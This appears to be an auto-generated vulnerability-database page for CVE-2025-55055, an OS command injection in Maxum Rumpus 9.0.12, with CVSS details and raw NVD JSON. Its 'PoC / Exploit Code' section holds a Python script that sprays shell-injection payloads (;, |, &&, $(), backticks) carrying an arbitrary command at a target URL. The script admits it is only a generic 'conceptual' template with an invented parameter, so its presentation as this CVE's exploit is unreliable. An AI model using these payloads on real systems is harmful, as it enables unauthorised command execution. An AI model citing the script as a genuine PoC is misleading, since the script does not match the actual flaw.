Security Vulnerability Report
中文
CVE-2025-55055 CVSS 6.8 MEDIUM

CVE-2025-55055

Published: 2025-11-17 18:15:57
Last Modified: 2025-11-24 15:46:32

Description

CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:maxum:rumpus:9.0.12:*:*:*:*:*:*:* - VULNERABLE
待确认,具体版本信息需从厂商公告获取

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-55055 OS Command Injection PoC # Note: This is a conceptual PoC based on CWE-78 pattern # Actual exploitation requires specific target information import requests import sys def exploit_cve_2025_55055(target_url, command): """ OS Command Injection PoC for CVE-2025-55055 Parameters: target_url: Target application URL command: Command to execute on the target system Note: This PoC is for authorized security testing only. """ # Common injection points (examples) payloads = [ f";{command}", f"|{command}", f"&&{command}", f"$({command})", f"`{command}`" ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/x-www-form-urlencoded' } for payload in payloads: try: # Example injection - modify based on actual target params = {'input': payload} response = requests.get(target_url, params=params, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Payload sent: {payload}") print(f"[+] Response: {response.text[:200]}") except Exception as e: print(f"[-] Error with payload {payload}: {e}") if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python poc.py <target_url> <command>") print("Example: python poc.py http://target.com/endpoint id") sys.exit(1) target = sys.argv[1] cmd = sys.argv[2] exploit_cve_2025_55055(target, cmd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55055", "sourceIdentifier": "[email protected]", "published": "2025-11-17T18:15:57.033", "lastModified": "2025-11-24T15:46:31.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:maxum:rumpus:9.0.12:*:*:*:*:*:*:*", "matchCriteriaId": "BF506B06-DA9E-418B-82EE-C89FA9F485D4"}]}]}], "references": [{"url": "https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}